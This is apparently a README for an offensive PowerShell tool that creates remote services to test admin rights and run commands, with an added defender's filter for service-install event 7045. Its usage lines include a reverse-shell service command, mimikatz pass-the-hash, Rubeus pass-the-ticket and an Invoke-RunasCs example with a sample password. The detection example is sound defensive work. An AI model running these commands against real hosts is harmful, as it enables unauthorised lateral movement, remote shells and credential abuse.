Creates and starts a service by bypassing the OpenService call to verify whether the current user has local administrator privileges on domain or LAN machines, assuming that only the SC_MANAGER_ALL_ACCESS right is available on the SCManager

pol4ir/Invoke-ServiceStrike

Invoke-ServiceStrike

Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming that only the SC_MANAGER_ALL_ACCESS right is available on the SCManager.

This script includes and executes a modified version of Invoke-PsExec originally published by Will Schroeder (@harmj0y).

Usage

Invoke-ServiceStrike -Command <cmd>
Invoke-ServiceStrike -Command <revShell> [-timeout <45000> -threads <5> -ComputerName <'192.168.1.103'> -ServiceName <sname>]
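
On the target host, a service created this way is recorded by the Service Control Manager as event 7045 ("A service was installed") in the System log. The following is an added example for defenders, not code from this repository: a PowerShell filter that flags service installs whose ImagePath launches a command interpreter. The function name, host names and sample records are constructed.

```powershell
# Added example, not part of Invoke-ServiceStrike. Names and sample records are constructed.
function Find-SuspiciousServiceInstall {
    param([Parameter(Mandatory, ValueFromPipeline)][psobject]$Record)
    begin {
        # Shells and script hosts that rarely belong in a legitimate service ImagePath.
        $interpreter = '(?i)(^|[\\/\s"])(cmd|powershell|pwsh|mshta|wscript|cscript)(\.exe)?(?=[\s"]|$)'
    }
    process {
        $reasons = @()
        if ($Record.ImagePath -match $interpreter) { $reasons += 'interpreter in ImagePath' }
        if ($Record.ImagePath -match '(?i)powershell|pwsh') {
            # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...).
            foreach ($m in [regex]::Matches($Record.ImagePath, '(?i)\s[-/](e\w*)(?=\s)')) {
                if ('encodedcommand'.StartsWith($m.Groups[1].Value.ToLower())) {
                    $reasons += 'encoded PowerShell command'
                }
            }
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Computer    = $Record.Computer
                ServiceName = $Record.ServiceName
                ImagePath   = $Record.ImagePath
                Reasons     = $reasons -join '; '
            }
        }
    }
}

# Constructed records shaped like System-log event 7045.
$sample = @(
    [pscustomobject]@{ Computer='WS01'; ServiceName='TEST'; ImagePath='cmd /c powershell -e <revb64>' }
    [pscustomobject]@{ Computer='WS01'; ServiceName='ExampleUpdater'; ImagePath='"C:\Program Files\Example\updater.exe" --service' }
    [pscustomobject]@{ Computer='WS02'; ServiceName='Maint'; ImagePath='C:\Windows\System32\cmd.exe /c C:\Temp\job.bat' }
)
$sample | Find-SuspiciousServiceInstall | Format-Table -AutoSize -Wrap

# Live collection on a host (7045 Properties order: name, image path, type, start type, account):
# Get-WinEvent -FilterHashtable @{ LogName='System'; ProviderName='Service Control Manager'; Id=7045 } |
#   ForEach-Object { [pscustomobject]@{ Computer    = $_.MachineName
#                                       ServiceName = $_.Properties[0].Value
#                                       ImagePath   = $_.Properties[1].Value } } |
#   Find-SuspiciousServiceInstall
```

The first and third sample records are flagged; the updater entry is not.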

RunAs

The script runs under the current user session. If you're in an interactive shell and need to execute it under a different security context, you can use Runas.

runas /user:contoso.local\user1 /netonly powershell

If you're working in a non-interactive shell, you can use Invoke-RunasCs:

Invoke-RunasCs -Domain contoso.local -Username user1 -Password dfgV?DS7-8 -Command "powershell . C:\Invoke-ServiceStrike.ps1;Invoke-ServiceStrike -Command 'cmd /c powershell -e <revb64>' -ServiceName TEST" -logontype 9

PTH

mimikatz.exe "sekurlsa::pth /domain:<> /user:<user> /ntlm:<hash> /run:powershell.exe"

PTT

Rubeus.exe -args ptt /ticket:<ticket>
